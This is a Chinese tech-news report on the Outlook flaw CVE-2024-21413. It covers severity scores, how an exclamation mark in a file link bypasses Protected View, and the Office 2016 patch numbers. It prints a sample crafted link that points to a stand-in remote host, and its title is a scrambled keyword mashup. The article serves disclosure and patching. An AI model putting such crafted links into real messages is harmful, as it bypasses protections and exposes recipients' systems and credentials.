首页 » 技术资讯 » 微软Outlook被曝严重漏洞(漏洞版本感叹号之家微软),outlook漏掉邮件。

微软Outlook被曝严重漏洞(漏洞版本感叹号之家微软),outlook漏掉邮件。

落叶飘零 2024-07-24 01:26:26 技术资讯 0

扫一扫用手机浏览

文章目录 [+]

该漏洞追踪编号为 CVE-2024-21413,在 CVSS 风险评估中基础得分(根据漏洞的固有特征反映漏洞的严重程度)为 9.8(满分 10 分),时间得分(评价漏洞被利用的时间窗的风险大小)为 8.5 分(满分 10 分)。

该漏洞由 Check Point Research 的安全专家 Haifei Li 发现并报告,根据微软官方描述,攻击者可以在文档扩展名及其嵌入链接后插入感叹号,就能绕过安全程序获得文档的高级权限,包括编辑潜在的恶意 "保护视图" 文档。

果文档中嵌入了带有 http 或 https 的超链接,Outlook 就会启动默认浏览器来显示它。
例如:

微软Outlook被曝严重漏洞(漏洞版本感叹号之家微软) 微软Outlook被曝严重漏洞(漏洞版本感叹号之家微软) 技术资讯
(图片来自网络侵删)

<ahref="skype:SkypeName?call">CallmeonSkype</a>

安全研究人员发现一个感叹号就足以绕过保护机制。
下面的链接演示了这一点:

微软Outlook被曝严重漏洞(漏洞版本感叹号之家微软) 微软Outlook被曝严重漏洞(漏洞版本感叹号之家微软) 技术资讯
(图片来自网络侵删)

<ahref="file///\\10.10.111.111\test\test.rtf!something">CLICKME</a>

微软目前已经发布了 Office 补丁,修复了 CVE-2024-21413 漏洞,并推荐用户尽快安装。

用于 Office 2016(32 位版本):

产品文章下载内部版本号Microsoft Office 2016(32 位版本)5002537安全更新16.0.5435.1001Microsoft Office 2016(32 位版本)5002467安全更新16.0.5435.1001Microsoft Office 2016(32 位版本)5002522安全更新16.0.5435.1001Microsoft Office 2016(32 位版本)5002469安全更新16.0.5435.1001Microsoft Office 2016(32 位版本)5002519安全更新16.0.5435.1001

For Office 2016(64 位版本):

产品文章下载内部版本号Microsoft Office 2016(64 位版本)5002537安全更新16.0.5435.1001Microsoft Office 2016(64 位版本)5002467安全更新16.0.5435.1001Microsoft Office 2016(64 位版本)5002522安全更新16.0.5435.1001Microsoft Office 2016(64 位版本)5002469安全更新16.0.5435.1001Microsoft Office 2016(64 位版本)5002519安全更新16.0.5435.1001

IT之家附上该漏洞的更多相关链接,感兴趣的用户可以点击阅读:

标签:

相关文章